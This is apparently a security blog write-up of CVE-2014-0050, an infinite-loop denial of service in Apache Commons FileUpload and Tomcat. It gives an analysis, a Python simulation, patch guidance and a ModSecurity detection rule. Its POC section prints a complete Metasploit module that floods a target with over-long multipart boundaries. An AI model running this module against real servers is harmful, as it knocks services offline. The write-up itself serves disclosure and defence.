catalog

1. Description
2. Analysis
3. POC
4. Solution

1. Description

MultipartStream.java in Apache Commons FileUpload before 1.3.1, as used in Apache Tomcat, JBoss Web, and other products, allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a crafted Content-Type header that bypasses a loop's intended exit conditions.
In short: every Apache Commons FileUpload release before 1.3.1 (1.3.1 contains the fix), including the copy embedded in Apache Tomcat and JBoss Web, can be driven into an infinite loop that burns CPU by a remote attacker who supplies a specially crafted Content-Type header.

Relevant Link:

http://cve.scap.org.cn/CVE-2014-0050.html
https://www.rapid7.com/db/vulnerabilities/apache-tomcat-cve-2014-0050
http://www.cnblogs.com/geekcui/p/3599425.html

2. Analysis

The original HTTP protocol had no file-upload facility; RFC 1867 (http://www.ietf.org/rfc/rfc1867.txt) added it. Browsers such as Microsoft IE, Mozilla and Opera send the user's chosen file to the server in the format this RFC specifies, and server-side code (PHP, ASP, JSP and so on) parses the uploaded file out of the request according to the same specification.
A typical multipart/form-data upload request looks like this:

POST /upload_file/UploadFile HTTP/1.1
Accept: text/plain, */*
Accept-Language: zh-cn
Host: 192.168.29.65:80
Content-Type: multipart/form-data; boundary=---------------------------7d33a816d302b6
User-Agent: Mozilla/4.0 (compatible; OpenOffice.org)
Content-Length: 424
Connection: Keep-Alive

-----------------------------7d33a816d302b6
Content-Disposition: form-data; name="userfile1"; filename="E:\s"
Content-Type: application/octet-stream

abbXXXccc
-----------------------------7d33a816d302b6
Content-Disposition: form-data; name="text1"

foo
-----------------------------7d33a816d302b6
Content-Disposition: form-data; name="password1"

bar
-----------------------------7d33a816d302b6--

As the example shows, the multipart/form-data body is divided into parts by a boundary line, and the boundary string itself is supplied by the client in the Content-Type header (each separator in the body is the header value prefixed with two dashes). The server therefore has to search the body for a delimiter whose length is entirely under the attacker's control.

0x1: Vulnerable code analysis

/commons/proper/fileupload/trunk/src/main/java/org/apache/commons/fileupload/MultipartStream.java


The fixed code has an extra "if" condition in the MultipartStream constructor (line number 330 in the fixed source) that rejects any multipart boundary longer than 4091 characters by throwing an IllegalArgumentException. The calculation is as follows (bufSize defaults to 4096, and BOUNDARY_PREFIX is the four bytes CR, LF, '-', '-' that the class prepends to the boundary before searching for it):

boundary.length > bufSize - 1 - BOUNDARY_PREFIX.length = 4096 - 1 - 4 = 4091
//parts of the code were copied into the org.apache.tomcat.util.http.fileupload package in Apache Tomcat, causing it to be affected.

0x2: Creating the exploit

So let's get Apache Tomcat installed and send the Apache Tomcat Manager application a request whose Content-Type boundary is longer than 4091 characters, with a body longer than 4096 bytes. The Metasploit module in section 3 below builds exactly such a request.

0x3: Why is this happening

While parsing the multipart message, the MultipartStream class refills its buffer for the current body part in ItemInputStream.makeAvailable(), which is written as a "for" loop of the form for (;;).

That innocent-looking "for" loop is an endless loop; it is "family related" to the famous while(true). The developer's intention was to leave it either by raising an exception when the input stream ends (line 1003) or by returning once some body data is available (line 1014). Unfortunately, when the boundary is longer than 4091 characters (as explained above) and the body is longer than 4096 bytes (so it can potentially contain the boundary), neither ever happens: the entire 4096-byte buffer is held back as a possible partial boundary, so each iteration asks the input stream for zero bytes, gets 0 back (not -1, which is only returned at end of stream), finds no boundary and no available data, and goes round again forever at full CPU.
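The mechanism described above, as an added Python model (this is not Commons FileUpload code and not from the Trustwave post): a PartReader class re-creates the head/tail/pad buffering and the for (;;) refill loop, reads the first part of the sample request from the Analysis section through it, and then shows the three outcomes for an over-long boundary: stream ended, hang (detected here by a no-progress check the real code does not have), and the 1.3.1 rejection. The class, function and constant names are this example's own, and the sample inputs are constructed.

```python
import io

DEFAULT_BUFSIZE = 4096        # MultipartStream.DEFAULT_BUFSIZE
BOUNDARY_PREFIX = b"\r\n--"   # CR LF - -, prepended to the header boundary by the class


class BoundaryTooLong(ValueError):
    """Raised by the 1.3.1 constructor check (IllegalArgumentException in Java)."""


class StreamEnded(EOFError):
    """Loop exit 1: the input ended before a boundary was found."""


class StuckInLoop(RuntimeError):
    """Not in the real code: raised here where the real loop spins forever."""


class PartReader:
    """Reads one body part through a fixed-size buffer, mirroring the
    head/tail/pad bookkeeping of MultipartStream.ItemInputStream (model only)."""

    def __init__(self, stream, header_boundary, buf_size=DEFAULT_BUFSIZE, fixed=False):
        self.input = stream
        self.boundary = BOUNDARY_PREFIX + header_boundary
        self.buf_size = buf_size
        if fixed and buf_size < len(self.boundary) + 1:
            # 1.3.1 check: with bufSize 4096 this rejects header boundaries
            # longer than 4096 - 1 - 4 = 4091 bytes
            raise BoundaryTooLong("buffer size too small for the boundary")
        self.buf = bytearray(buf_size)
        self.head = 0    # first unread byte in buf
        self.tail = 0    # one past the last valid byte in buf
        self.pos = -1    # offset of the boundary in buf, -1 if not (yet) found
        self.pad = 0     # trailing bytes held back because they may start a boundary

    def _find_separator(self):
        self.pos = self.buf.find(self.boundary, self.head, self.tail)
        if self.pos == -1:
            self.pad = min(len(self.boundary), self.tail - self.head)

    def _available(self):
        if self.pos != -1:
            return self.pos - self.head
        return self.tail - self.head - self.pad

    def _make_available(self):
        """The for (;;) refill loop from the analysis above."""
        if self.pos != -1:
            return 0
        # move the held-back bytes to the front and refill behind them
        self.buf[0:self.pad] = self.buf[self.tail - self.pad:self.tail]
        self.head, self.tail = 0, self.pad
        while True:
            want = self.buf_size - self.tail
            # Java read(buf, off, 0) returns 0, never -1: once the pad fills
            # the buffer the end-of-stream exit can no longer be reached
            chunk = self.input.read(want) if want > 0 else b""
            if want > 0 and not chunk:
                raise StreamEnded("Stream ended unexpectedly")      # exit 1
            self.buf[self.tail:self.tail + len(chunk)] = chunk
            self.tail += len(chunk)
            self._find_separator()
            av = self._available()
            if av > 0 or self.pos != -1:
                return av                                            # exit 2
            if not chunk:
                # nothing read, nothing changed: every further iteration is
                # identical, which is where the real code burns 100% CPU
                raise StuckInLoop("boundary fills the whole buffer")

    def read_part(self):
        """Return the bytes of the current part up to the next boundary."""
        out = bytearray()
        while True:
            av = self._available()
            if av > 0:
                out += self.buf[self.head:self.head + av]
                self.head += av
            elif self.pos != -1:
                return bytes(out)
            else:
                self._make_available()


def read_first_part(header_boundary, body, buf_size=DEFAULT_BUFSIZE, fixed=False):
    return PartReader(io.BytesIO(body), header_boundary, buf_size, fixed).read_part()


def simulate(boundary_len, body_len, fixed=False):
    """Outcome for a constructed body that never contains the boundary."""
    try:
        read_first_part(b"0" * boundary_len, b"A" * body_len, fixed=fixed)
        return "ok"
    except BoundaryTooLong:
        return "rejected"
    except StreamEnded:
        return "eof"
    except StuckInLoop:
        return "hang"


# constructed from the sample request above: the first part's body onwards
HEADER_BOUNDARY = b"-" * 27 + b"7d33a816d302b6"
SAMPLE_FIRST_PART = (b"abbXXXccc\r\n--" + HEADER_BOUNDARY
                     + b'\r\nContent-Disposition: form-data; name="text1"\r\n\r\nfoo\r\n--'
                     + HEADER_BOUNDARY + b"--\r\n")

if __name__ == "__main__":
    print(read_first_part(HEADER_BOUNDARY, SAMPLE_FIRST_PART, buf_size=48))
    print(simulate(4091, 4500), simulate(4092, 4097), simulate(4092, 4097, fixed=True))
```

The buf_size=48 call forces the pad-and-refill path even for the short sample, and simulate(4091, ...) still terminates because one byte of the 4096-byte buffer stays outside the pad on every refill; that single byte is exactly why 4091 is the threshold and 4092 is not.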

Relevant Link:

https://www.trustwave.com/Resources/SpiderLabs-Blog/CVE-2014-0050--Exploit-with-Boundaries,-Loops-without-Boundaries/

3. POC

0x1: Metasploit

msf > use auxiliary/dos/http/apache_commons_fileupload_dos
msf auxiliary(apache_commons_fileupload_dos) > show actions
...actions...
msf auxiliary(apache_commons_fileupload_dos) > set ACTION <action-name>
msf auxiliary(apache_commons_fileupload_dos) > show options
...show and set options...
msf auxiliary(apache_commons_fileupload_dos) > run

0x2: apache_commons_fileupload_dos.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Apache Commons FileUpload and Apache Tomcat DoS',
      'Description' => %q{
        This module triggers an infinite loop in Apache Commons FileUpload 1.0
        through 1.3 via a specially crafted Content-Type header.
        Apache Tomcat 7 and Apache Tomcat 8 use a copy of FileUpload to handle
        mime-multipart requests, therefore, Apache Tomcat 7.0.0 through 7.0.50
        and 8.0.0-RC1 through 8.0.1 are affected by this issue. Tomcat also
        uses Commons FileUpload as part of the Manager application.
      },
      'Author'      =>
        [
          'Unknown', # This issue was reported to the Apache Software Foundation and accidentally made public.
          'ribeirux' # metasploit module
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          ['CVE', '2014-0050'],
          ['URL', 'http://tomcat.apache.org/security-8.html'],
          ['URL', 'http://tomcat.apache.org/security-7.html']
        ],
      'DisclosureDate' => 'Feb 6 2014'
    ))

    register_options(
      [
        Opt::RPORT(),
        OptString.new('TARGETURI', [ true, "The request URI", '/']),
        OptInt.new('RLIMIT', [ true, "Number of requests to send" ])
      ], self.class)
  end

  def run
    # 4092 bytes: one more than the 4091-byte limit derived above, so the
    # boundary plus its 4-byte prefix no longer fits in the 4096-byte buffer
    boundary = "0" * 4092

    opts = {
      'method'  => "POST",
      'uri'     => normalize_uri(target_uri.to_s),
      'ctype'   => "multipart/form-data; boundary=#{boundary}",
      # 4097-byte body: longer than the buffer, so the buffer fills completely
      'data'    => "#{boundary}00000",
      'headers' => {
        'Accept' => '*/*'
      }
    }

    # XXX: There is rarely, if ever, a need for a 'for' loop in Ruby
    # This should be rewritten with .upto() or Enumerable#each or
    # something
    for x in 1..datastore['RLIMIT']
      print_status("Sending request #{x} to #{peer}")
      begin
        c = connect
        r = c.request_cgi(opts)
        c.send_request(r)
        # Don't wait for a response
      rescue ::Rex::ConnectionError => exception
        print_error("#{peer} - Unable to connect: '#{exception.message}'")
        return
      ensure
        disconnect(c) if c
      end
    end
  end
end

Relevant Link:

https://www.rapid7.com/db/modules/auxiliary/dos/http/apache_commons_fileupload_dos
https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb

4. Solution

0x1: Defend yourself

1. Once available, update your software to one of the following versions:
Apache Commons FileUpload 1.3.1
Apache Tomcat 7.0.52
Apache Tomcat 8.0.2
2. Alternatively, apply the appropriate patch:
Apache Commons FileUpload: http://svn.apache.org/r1565143
Apache Tomcat 8: http://svn.apache.org/r1565163
Apache Tomcat 7: http://svn.apache.org/r1565169

Note that the fix does not make over-long boundaries work: the MultipartStream constructor now throws an IllegalArgumentException for them, so the request fails immediately instead of pinning a worker thread at 100% CPU.

0x2: ModSecurity Commercial Rule Set

SecRule REQUEST_HEADERS:Content-Type "@rx .{4000}"
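What the rule above actually tests, compared with the exact threshold from the analysis, as an added Python check (not part of the page or of the ModSecurity rule set): "@rx .{4000}" fires on any Content-Type value containing a run of 4000 characters, which every attack header necessarily does (a boundary longer than 4091 bytes is on its own longer than 4000), but it also fires on long headers whose boundary is still within the limit. The boundary parser, the classify() function and the constructed header values are this example's own.

```python
import re

MODSEC_RULE = re.compile(r".{4000}")           # the "@rx .{4000}" test: any 4000-character run
MAX_SAFE_BOUNDARY = 4096 - 1 - len(b"\r\n--")  # 4091, from the calculation in the analysis
# boundary parameter, quoted or bare (assumed parser; adequate for real-world headers)
_BOUNDARY_RE = re.compile(r';\s*boundary\s*=\s*(?:"([^"]*)"|([^;\s]+))', re.IGNORECASE)


def boundary_param(content_type):
    """Return the boundary parameter of a Content-Type value, or None."""
    m = _BOUNDARY_RE.search(content_type)
    if not m:
        return None
    return m.group(1) if m.group(1) is not None else m.group(2)


def classify(content_type):
    """(rule_matches, would_hang_unpatched, boundary_length) for one header value."""
    b = boundary_param(content_type)
    length = len(b.encode("latin-1")) if b is not None else 0
    return (MODSEC_RULE.search(content_type) is not None,
            length > MAX_SAFE_BOUNDARY,
            length)


# constructed header values
NORMAL = "multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW"
ATTACK = "multipart/form-data; boundary=" + "0" * 4092             # what the module above sends
LONG_BUT_SAFE = 'multipart/form-data; boundary="' + "0" * 4091 + '"'  # rule fires, no hang

if __name__ == "__main__":
    for name, value in (("normal", NORMAL), ("attack", ATTACK), ("long-but-safe", LONG_BUT_SAFE)):
        print(name, classify(value))
```

The second tuple element is the test to use if you want a precise virtual patch at a reverse proxy or in application code; the rule as written trades that precision for a check that needs no header parsing and can never miss a genuine attack.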

Relevant Link:

http://tomcat.apache.org/security-7.html

Copyright (c) 2015 Little5ann All rights reserved
